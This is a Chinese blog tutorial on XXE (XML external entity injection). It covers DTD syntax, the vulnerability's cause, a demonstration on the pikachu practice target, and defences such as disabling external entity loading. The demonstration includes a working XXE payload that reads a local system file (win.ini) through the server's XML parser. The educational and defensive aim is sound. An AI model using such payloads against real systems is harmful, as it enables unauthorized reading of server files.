网络安全-XXE(XML外部实体注入)原理、攻击及防御

简介: 网络安全-XXE(XML外部实体注入)原理、攻击及防御

前言

XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。

博主之前用xml也没有使用过DTD,因为是可选的嘛,这里就简单说一下,学过的跳过。

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。

内部声明DTD

<!DOCTYPE 根元素 [元素声明]>

引用外部DTD文档

<!DOCTYPE 根元素 SYSTEM "文件名">

<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

内部声明实体

<!ENTITY 实体名称 "实体的值">

引用外部实体

<!ENTITY 实体名称 SYSTEM "URI">

<!ENTITY 实体名称 PUBLIC "public_ID" "URI">

调用方式:&实体名称;

简介

XML外部实体注入(XML External Entity,为什么不取首字母呢...),简称XXE漏洞。

原理

服务端接收并解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

攻击

使用靶机:pikachu

2020062310470442.png

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker "lady_killer9">
]>
<name>&hacker;</name>

2020062310470442.png

                                                 字符串回显

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker SYSTEM "file:///C:/windows/win.ini">
]>
<name>&hacker;</name>

 2020062310470442.png

                                       敏感文件查看

防御

禁用外部实体

PHP中使用libxml_disable_entity_loader(true);

其他语言(C++、Java等):owasp XXE防御备忘录


博主在做项目时使用的是xml.etree.ElementTree,在python官方文档中也提到对于错误xml以及恶意构建的xml可能存在解析漏洞。不过,python在外部实体注入方面认为是安全的。

过滤用户提交的XML数据

过滤掉关键词:SYSTEM和PUBLIC

更多内容查看:网络安全-自学笔记

喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

相关文章
|
2天前
|
监控 安全 网络安全
网络安全的盾与剑:漏洞防御与加密技术解析
【9月更文挑战第17天】在数字时代的浪潮中,网络安全成为保护数据和隐私的关键防线。本文深入浅出地探讨了网络安全的两大支柱:漏洞防御和加密技术,旨在提升公众的安全意识并分享防护策略。我们将从基础概念出发,逐步深入到技术细节,不仅阐释原理,还提供实际案例分析,帮助读者构建起一道坚固的数字防御墙。
16 3
|
9天前
|
存储 安全 网络协议
网络安全的盾牌与剑:漏洞防御与加密技术
【9月更文挑战第10天】在数字时代的浪潮中,网络安全成为守护信息资产的盾牌与剑。本文将探讨网络安全的两个核心议题:网络漏洞的防御策略和加密技术的应用。通过深入浅出的分析,我们将了解如何识别和防范安全威胁,以及如何利用加密技术保护数据安全。文章旨在提升公众的安全意识,为打造更安全的网络环境提供实践指南。
32 11
|
10天前
|
SQL 监控 安全
数字堡垒之下:网络安全的现代挑战与防御策略
在这个数字信息日益增长的时代,网络安全已成为保护个人隐私和企业资产的关键战场。本文将深入探讨网络安全中常见的漏洞、先进的加密技术以及提升安全意识的重要性。通过分析最新的网络攻击案例和防御措施,我们旨在为读者提供一套实用的网络安全知识框架,帮助大众构建更为坚固的数字防线。
28 7
|
10天前
|
机器学习/深度学习 人工智能 自然语言处理
深度剖析深度神经网络(DNN):原理、实现与应用
本文详细介绍了深度神经网络(DNN)的基本原理、核心算法及其具体操作步骤。DNN作为一种重要的人工智能工具,通过多层次的特征学习和权重调节,实现了复杂任务的高效解决。文章通过理论讲解与代码演示相结合的方式,帮助读者理解DNN的工作机制及实际应用。
|
6天前
|
网络协议 Linux 应用服务中间件
Socket通信之网络协议基本原理
【9月更文挑战第14天】网络协议是机器间交流的约定格式,确保信息准确传达。主要模型有OSI七层与TCP/IP模型,通过分层简化复杂网络环境。IP地址全局定位设备,MAC地址则在本地网络中定位。网络分层后,数据包层层封装,经由不同层次协议处理,最终通过Socket系统调用在应用层解析和响应。
|
7天前
|
云安全 缓存 网络协议
如何防护DDoS攻击,筑牢网络安全防线
随着信息技术的飞速发展,网络已成为现代社会不可或缺的一部分,极大地便利了个人社交和商业活动。然而,网络空间在创造无限机遇的同时,也潜藏着诸多威胁,其中分布式拒绝服务攻击(DDoS,Distributed Denial of Service)以其高破坏力和难以防范的特点,成为网络安全领域的一大挑战。本文将从DDoS攻击的原理出发,详细探讨如何有效防护DDoS攻击,以筑牢网络安全防线。
|
7天前
|
SQL 安全 网络安全
网络安全的盾牌与矛:漏洞防御与加密技术
【9月更文挑战第12天】在数字时代的浪潮中,网络安全成为保护信息资产不可或缺的防线。本文深入探讨了网络安全的核心问题——安全漏洞及其防范措施,同时对加密技术进行了详细解读,旨在提高公众的安全意识,并分享实用的防护策略。从基础概念到实际操作,我们一步步揭示如何在日益复杂的网络环境中保护自己的数据不受威胁。
|
7天前
|
网络协议 网络架构 数据格式
TCP/IP基础:工作原理、协议栈与网络层
TCP/IP(传输控制协议/互联网协议)是互联网通信的基础协议,支持数据传输和网络连接。本文详细阐述了其工作原理、协议栈构成及网络层功能。TCP/IP采用客户端/服务器模型,通过四个层次——应用层、传输层、网络层和数据链路层,确保数据可靠传输。网络层负责IP寻址、路由选择、分片重组及数据包传输,是TCP/IP的核心部分。理解TCP/IP有助于深入掌握互联网底层机制。
33 2
|
10天前
|
安全 网络安全 量子技术
网络安全的盾牌与剑:漏洞防御与加密技术
【9月更文挑战第8天】在数字世界的海洋中,网络安全是航行者的罗盘和船锚。本文将探讨网络安全的两大支柱:一是识别和修补安全漏洞,二是运用加密技术保护数据的安全。我们将从基础概念出发,逐步深入到实践操作,旨在提升公众的安全意识和技能,共同构建一个更加安全的网络环境。
|
10天前
|
存储 SQL 安全
网络安全的盾牌:漏洞防御与加密技术解析
【9月更文挑战第9天】在数字时代,网络安全的重要性日益凸显,它不仅是保护个人隐私和数据安全的屏障,也是维护社会稳定和经济繁荣的关键。本文将深入探讨网络安全中的漏洞防御策略、加密技术的运用以及提升公众安全意识的必要性,旨在通过知识分享,增强大众对网络威胁的防范能力,共同构建更安全的网络环境。